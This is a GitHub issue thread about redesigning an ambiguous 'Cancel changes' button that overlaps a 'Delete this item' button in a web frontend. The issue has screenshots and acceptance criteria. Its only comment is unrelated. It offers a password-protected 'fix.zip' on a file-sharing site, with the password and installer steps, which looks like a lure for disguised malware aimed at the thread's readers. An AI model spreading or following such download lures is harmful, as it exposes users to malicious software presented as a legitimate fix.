### ISSUE TITLE
Fix ambiguous "cancel change" button design with "delete item"

### ISSUE THREAD

**Issue by smadbe** [France-ioi/AlgoreaFrontend#1768]
## Overview
When scrolling, the "Cancel changes" (when changing something in item parameters for instance) button may be mixed with other element which may be confusing, for instance when over the "delete this item" button.

![Screenshot from 2024-08-26 14-58-21](https://github.com/user-attachments/assets/3bb1683c-97d2-4bcf-9177-3ba01e521651)

## Acceptance criteria
- [ ] Put a white background (instead of transparent)  to "Cancel Changes" button, and a bit-darker opaque hover color (there already a transparent red background).
- [ ] May be put "external white border" (as the box shadow on "focus") on "save" and "cancel changes" so that they do not mix too much with the content when they are on top of it
- [ ] Left align the "Delete this item" button, move its optional message on its right then

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
